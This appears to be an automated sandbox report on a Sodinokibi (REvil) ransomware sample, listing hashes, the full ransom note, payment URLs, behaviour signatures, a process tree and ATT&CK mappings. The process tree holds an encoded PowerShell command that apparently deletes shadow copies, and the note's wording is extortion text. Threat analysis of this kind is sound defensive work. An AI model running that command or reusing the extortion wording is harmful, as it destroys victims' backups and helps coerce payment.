Analysis

  • max time kernel
    143s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:50

General

  • Target

    7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15.exe

  • Size

    207KB

  • MD5

    151ae10c5420285797f5204d4b3c9666

  • SHA1

    13e33b4228975bac515d68513f9688f9278875b7

  • SHA256

    7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15

  • SHA512

    041d9bba9d0f92364204d8fab856bf9cf09240d94c6372003eac21bce31a3924ba3512413e6c27762bb798ae3908be5060ce104ff40206eaf85d15def8efd907

Score
10/10

Malware Config

Extracted

Path

C:\v1zz4aj-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion v1zz4aj. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:
1) [Recommended] Using a TOR browser!
   a) Download and install TOR browser from this site: https://torproject.org/
   b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6693C1C35B0228F2
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
   a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
   b) Open our secondary website: http://decryptor.top/6693C1C35B0228F2
Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key: 5wyc5udixfNWFLEnLBm5i0iHEip7kxCM7O1Tyrz/CRqVwPPE5P5Fyuw8LnmbRjec WiBp6hDR5v+FpubC8kJrirMscLYXEmrQkXQfdivfyYru/HMZmA2rzzuvQdTxNe18 DBcGX48TzKcbfjdEcJQcfxLSoyZCgDmH9kadeK5msOT/HB/ETFHJSxv+gOj0LZvS yQQqcofIo4Tj+KtJgpTBjlqa0U6AssVWi/OT4ir6Z7KEFbEP6mxCB1csMcqfs/WZ KVODVeHDkxkpAZK3tp1Iw1E5zWTzkEUDosJpFB9/ut5E5GS0YAsU8JldE2CcF2IL XAoqYMDUFmg8gYf/0n/jTHByecKDYw7T4wN6s8GQTSmhduKwxDVmLWcxLCQ1yN32 Z+AjsYu0ZqR1NTp5/KXaN4KDU0CiZcCuvBuz4CMVSf/lXM73Iwxv9Xu64INpeSr3 qvE7PkUPcCsAStPeV2wsCyYdNojDmJjIxnn76DLEITCwawdsVKqJE/MvsMPJfM9b BDz4CGzxCCB2P7DufWZ1+2FFor1DSGjHsguNaGGkrNV5T9ylRrOZiX8qclT8YtiW 9kfgae6A7j1NhnBeDmt5Tx9sHH9WNaZFCa2NXedpQi/ZTVIyFdpf0sDCVs7W1rdj nsp1yw2LLCFLSOAgjirvlulAMAxZ5UVmBiMC9gNXHo7lzwr77AWHjHjyc31t1EuE vdxDzOmOq8vY32lHGuL/7hvx2u5E55BmTt+0jxLMicN41geLe5MpBjsBVGsg9aTC JYcf/AqFS0wAm+qlxDp6iqpLxI71PQUeM7HpWqXH7YHjewTuSFODutvf1Pyz54hL oGRI3TGnYn6KjaaCm18ksnQbubn7O5OHNCOxRZZddrV501GMIx9DAF2++nDjhhF9 oynzaAh5w261NZQ/gU+rPIfZy+aZPdQ43X3+zPsHJmYdE7sv1TpE/9fTn+7L+76n QdQu9og3NYTzPGSREhyDALqzeBCnwsJIVsLexxj5PDaykse0/3bLra/JQVrSBDWY vggcdhOxdUD4oev6JI0/keaWJNFfMfLPA8CIJnd4VxFset0lX4c+aeiEyUlT6Ow2 Sg+3wrzcVsowUQikKi+7c/xzYej7Cti6YNFpVoMNRWzwqs8boQDsMDwM/j9Luncb 2G8=
Extension name: v1zz4aj

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6693C1C35B0228F2

http://decryptor.top/6693C1C35B0228F2

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15.exe
    "C:\Users\Admin\AppData\Local\Temp\7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2040
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:612
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1092

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    • Modify Registry (T1112): 2
    • Install Root Certificate (T1130): 1

  • Discovery
    • Query Registry (T1012): 1
    • Peripheral Device Discovery (T1120): 1
    • System Information Discovery (T1082): 1

  • Impact
    • Defacement (T1491): 1


    Downloads

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/1672-54-0x0000000076641000-0x0000000076643000-memory.dmp
      Filesize

      8KB

    • memory/2040-55-0x000007FEFC401000-0x000007FEFC403000-memory.dmp
      Filesize

      8KB

    • memory/2040-57-0x00000000026A0000-0x00000000026A2000-memory.dmp
      Filesize

      8KB

    • memory/2040-58-0x00000000026A2000-0x00000000026A4000-memory.dmp
      Filesize

      8KB

    • memory/2040-59-0x00000000026A4000-0x00000000026A7000-memory.dmp
      Filesize

      12KB

    • memory/2040-56-0x000007FEF34E0000-0x000007FEF403D000-memory.dmp
      Filesize

      11.4MB

    • memory/2040-60-0x00000000026AB000-0x00000000026CA000-memory.dmp
      Filesize

      124KB